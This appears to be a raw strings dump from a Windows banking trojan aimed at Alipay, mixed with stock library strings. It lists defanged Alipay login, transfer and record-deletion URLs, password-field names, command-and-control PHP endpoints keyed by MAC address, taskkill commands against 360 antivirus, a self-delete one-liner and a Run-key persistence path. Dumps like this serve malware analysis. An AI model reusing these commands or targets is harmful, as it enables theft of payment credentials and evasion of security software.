CtableMultiCorePatternUrlMultiCorePatternUrl
CREATE TABLE MultiCorePatternUrl (url VARCHAR(1024) default 0,client_id INTEGER default -1)
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)-
indexsqlite_autoindex_db_info_1db_info
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INT
hXXps://my.alipay.com/portal/i.htm/
hXXps://lab.alipay.com/user/navigate.htm/
hXXps://authzth.alipay.com/login/certcheck.htm/
hXXps://auth.alipay.com/login/index.htm/
hXXps://auth.alipay.com/
hXXp://VVV.baidu.com/link/
hXXp://auth.alipay.com/login/index.htm/
hXXp://auth.alipay.com/
hXXps://tbapi.alipay.com/trade/trade_payment.htm/
hXXps://cashierzue.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzue.alipay.com/preprocess/trade/tradepreprocessgw.htm/
hXXp://buyer.trade.taobao.com/trade/pay.htm/
hXXps://cashierzue.alipay.com/standard/gateway/ebankpay.htm/
hXXps://cashierztg.alipay.com/standard/fastpay/fastpaycashier.htm/
hXXps://cashierzui.alipay.com/standard/payment/bankcardform.htm/
hXXps://cashierzui.alipay.com/standard/gateway/ebankpay.htm/
hXXps://VVV.alipay.com/
hXXp://VVV.alipay.com/
hXXp://mse.sogou.com/app/features/feichuan.h
CREATE TABLE MultiCorePatternUrl (url VARCHA
CREATE TABLE db_info (id VARCHAR(1024) PRIMARY KEY,value VARCHAR(1024),reserved INTEGER)-
CREATE TABLE MultiCorePattern (dirty INTEGER default 1,server_id VARCHAR(1024),client_id INTEGER PRIMARY KEY,coretype INTEGER default 0)}
1indexMultiCorePatternUrl_client_id_indexMultiCorePatternUrl
CREATE INDEX MultiCorePatternUrl_client_id_index ON MultiCorePatternUrl(client_id)
hXXp://mse.sogou.com/app/features/feichuan.html/
hXXps://consumeprod.alipay.com/record/standard.htm/
hXXps://consumeprod.alipay.com/record/index.htm/
Software\Tencent\QQBrowser\Advanced\EnableChromeTab
alipay_jmp.txt
Software\Classes\360seURL\Application\ApplicationIcon
Software\Microsoft\Windows\CurrentVersion\Uninstall\360Chrome\DisplayIcon
hXXps://shenghuo.alipay.com/transfercore/validateTransferSuperBankFlow.json
hXXps://shenghuo.alipay.com/transfercore/fill.htm
hXXps://omeo.alipay.com/service/checkcode?sessionID=
SESSIONkEY
-12027,TEAKEY
&payChannel=0100&supportTime=
hXXps://shenghuo.alipay.com/transfercore/confirmSuperNet.htm
supportTime
passConfirmCheck
:yhk_error03.html-----------------------------
c:\yhkerror03.html
&passConfirmCheck=
&supportTime=
hXXps://shenghuo.alipay.com/transfercore/fillAction.htm
payment/cashier.htm?orderId=
yhk_error02.html
:yhk_error02.html-----------------------------
hXXps://lab.alipay.com/consume/record/inpour.htm
hXXps://financeprod.alipay.com/fund/asset.htm
suibianyige@qq.com
yhk_error01.html
:yhk_error01.html
yhkok.html
[yhkok.html]
yhk_error03.html
hXXps://shenghuo.alipay.com/send/payment/fill.htm
&title=תÕË&memo=&smsNo=
&title=תÕË&memo=&smsNo=
hXXps://shenghuo.alipay.com/send/payment/submit.htm
hXXps://shenghuo.alipay.com/send/payment/submit.htm
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
pageAbsUrl:"hXXp://shenghuo.alipay.com/send/confirm.htm?orderId=
hXXps://shenghuo.alipay.com/send/confirm.htm
hXXps://shenghuo.alipay.com/send/confirm.htm
dingdan.html
dingdan.html
:dingdan.html
:dingdan.html
zfb_ssid_error01.html
zfb_ssid_error01.html
zfb_ssid_error01.html
zfb_ssid_error01.html
yhdd.html
yhdd.html
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
hXXps://cashierzth.alipay.com/standard/payment/bankCardForm.htm
.htm?outBizNo=
.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
hXXps://cashierzth.alipay.com/standard/gateway/ebankPay.htm?outBizNo=
alipay_yhzf_error01.txt
alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
:alipay_yhzf_error01.txt
function time(){return new Date().getTime()}
function time(){return new Date().getTime()}
hXXps://authztg.alipay.com/login/homeB.htm
hXXps://authztg.alipay.com/login/homeB.htm
password_input
password_input
password
password
J-login-btn
J-login-btn
personalweb.alipay.com
personalweb.alipay.com
:login_error01.txt
:login_error01.txt
login_error01.txt
login_error01.txt
Y@hXXps://consumeprod.alipay.com/record/standard.htm
Y@hXXps://consumeprod.alipay.com/record/standard.htm
hXXps://consumeprod.alipay.com/record/delete.json?record=
hXXps://consumeprod.alipay.com/record/delete.json?record=
alipay.com
alipay.com
cashier.htm
cashier.htm
zfb_error01.txt
zfb_error01.txt
:zfb_error01.txt
:zfb_error01.txt
payment/cashier.htm
payment/cashier.htm
error.htm
error.htm
:zfb_error02.txt
:zfb_error02.txt
zfb_error02.txt
zfb_error02.txt
tcresult.htm
tcresult.htm
ebitexpresspay.htm
ebitexpresspay.htm
waitresult.htm
waitresult.htm
payresult.htm
payresult.htm
:zf_error01.txt
:zf_error01.txt
zf_error01.txt
zf_error01.txt
:zf_error02.txt
:zf_error02.txt
zf_error02.txt
zf_error02.txt
c:\1242421.txt
c:\1242421.txt
hXXp://
hXXp://
hXXps://
hXXps://
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
hXXps://yebprod.alipay.com/yeb/quickRedeemApply.htm
:yeb_error01.txt
:yeb_error01.txt
yeb_error01.txt
yeb_error01.txt
quickRedeemResult.htm
quickRedeemResult.htm
url!!
url!!
quickRedeemApply.htm
quickRedeemApply.htm
:yeb_error02.txt
:yeb_error02.txt
yeb_error02.txt
yeb_error02.txt
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://personalportal.alipay.com/portal/account/index.htm
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://zht.alipay.com/asset/assetStatistics.json?_input_charset=utf-8&categoryType=FASTPAYSERVICE&t=
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://shenghuo.alipay.com/transfer/deposit/depositPreprocessGw.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositCardForm.htm
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/deposit/depositAmountValidate.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
hXXps://cashierzui.alipay.com/standard/gateway/ebankDeposit.json
url":"
url":"
,URL:
,URL:
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
hXXps://shenghuo.alipay.com/transfer/ac/acFill.htm
function document.onkeydown()
function document.onkeydown()
if ( event.keyCode==9)
if ( event.keyCode==9)
event.keyCode = 0;
event.keyCode = 0;
event.cancelBubble = true;
event.cancelBubble = true;
s_sc.php?mac=
s_sc.php?mac=
test.txt
test.txt
s_start.php?mac=
s_start.php?mac=
&ping 127.0.0.1 -n 2&del /q "
&ping 127.0.0.1 -n 2&del /q "
cmd /c taskkill /F /IM
cmd /c taskkill /F /IM
s_submitqq.php?mac=
s_submitqq.php?mac=
360sd.exe
360sd.exe
360safe.exe
360safe.exe
s_sendsd.php?mac=
s_sendsd.php?mac=
\svchost.exe
\svchost.exe
@>c:\cmd.txt
@>c:\cmd.txt
cmd /c
cmd /c
c:\cmd.txt
c:\cmd.txt
shell/setshell.php
shell/setshell.php
s_subitqq.php?mac=
s_subitqq.php?mac=
@/desk/desk_get.php
@/desk/desk_get.php
s_getbox.php?mac=
s_getbox.php?mac=
/file/sendfile.php?mac=
/file/sendfile.php?mac=
update/check.php?check=1.3
update/check.php?check=1.3
\update.exe
\update.exe
anonymous@123.com
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
WinExec
WinExec
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
ShellExecuteA
ShellExecuteA
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
RegCreateKeyExA
RegCreateKeyExA
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
[%s:%d]
[%s:%d]
Range: bytes=%s-
Range: bytes=%s-
[%s:%d]
[%s:%d]
PASS %s
PASS %s
PASS ******
PASS ******
USER %s
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
SIZE %s
PORT
PORT
User-Agent: %s
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Referer: %s
Host: %s
Host: %s
GET %s HTTP/1.1
GET %s HTTP/1.1
HTTP/1.0
HTTP/1.0
HTTP/1.1
HTTP/1.1
Cookie: %s
Cookie: %s
%d, %s
%d, %s
\\192.168.0.129\TCP\1037
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
%s %s %s
Session: %s
Session: %s
Cseq: %u
Cseq: %u
%*s %s
%*s %s
%*s %u
%*s %u
CSeq: %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i
rtsp://%s:%i/%s
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
Range: npt=%s-
%s/streamid=1
%s/streamid=1
%s/streamid=0
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
If-Match: %s
RealChallenge2: %s, sd=%s
RealChallenge2: %s, sd=%s
Title: %s
Title: %s
Copyright: %s
Copyright: %s
Author: %s
Author: %s
real: Content-length for description too big (> %uMB)!
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Bandwidth: %u
Challenge1: %s
Challenge1: %s
hash output: %x %x %x %x
hash output: %x %x %x %x
hash input: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
stream=%u;rule=%u,
Illegal character '%c' in input.
Illegal character '%c' in input.
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADUUWiseHelper.dll
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADUUWiseHelper.dll
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
VERSION.dll
VERSION.dll
RASAPI32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
oledlg.dll
oledlg.dll
WSOCK32.dll
WSOCK32.dll
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
%x.tmp
%x.tmp
icmp.dll
icmp.dll
(*.htm;*.html)|*.htm;*.html
(*.htm;*.html)|*.htm;*.html
VVV.dywt.com.cn
VVV.dywt.com.cn
%s\%s.lnk
%s\%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
X-X-X-X-X-X
X-X-X-X-X-X
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
1.0.6
1.0.6
\shell32.dll
\shell32.dll
1.1.3
1.1.3
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
Corrupt JPEG data: found marker 0xx instead of RST%d
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Obtained XMS handle %u
Freed XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Opened temporary file %s
Closed temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
Smoothing not supported with nonstandard sampling ratios
RST%d
RST%d
At marker 0xx, recovery action %d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
= = = = = = = =
Obtained EMS handle %u
Obtained EMS handle %u
Freed EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Unsupported marker type 0xx
Failed to create temporary file %s
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Cannot quantize more than %d color components
Insufficient memory (case %d)
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Backing store not supported
Arithmetic table 0xx was not defined
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DQT index %d
Bogus DHT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC value 0x%x
Bogus DAC index %d
Bogus DAC index %d
Unsupported color conversion request
Unsupported color conversion request
Too many color components: %d, max %d
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Invalid component ID %d in SOS
NULL row buffer for row %ld, pass %d
NULL row buffer for row %ld, pass %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
Unknown zTXt compression type %d
Unknown zTXt compression type %d
gamma = (%d/100000)
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
incorrect gamma=(%d/100000)
%s: Cannot open
%s: Cannot open
%s: Write error at scanline %lu
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Unknown %stag %u
%f: Bad value for "%s"
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
%s: Invalid %stag "%s" (not supported by codec)
TIFFVSetField ... pass by value not imp.
TIFFVSetField ... pass by value not imp.
%ld: Bad value for "%s"
%ld: Bad value for "%s"
%d: Bad value for "%s"
%d: Bad value for "%s"
Nonstandard tile length %d, convert file
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
%s: Invalid InkNames value; expecting %d names, found %d
TIFFVGetField ... pass by value not imp.
TIFFVGetField ... pass by value not imp.
Sorry, can not handle images with %d-bit samples
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Sorry, LogL data must have %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Missing needed %s tag
Missing needed %s tag
Sorry, can not image with %d-bit samples
Sorry, can not image with %d-bit samples
"%s": Bad mode
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Sample %d out of range, max %u
Internal error, unknown tag 0x%x
Internal error, unknown tag 0x%x
Tag %d
Tag %d
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
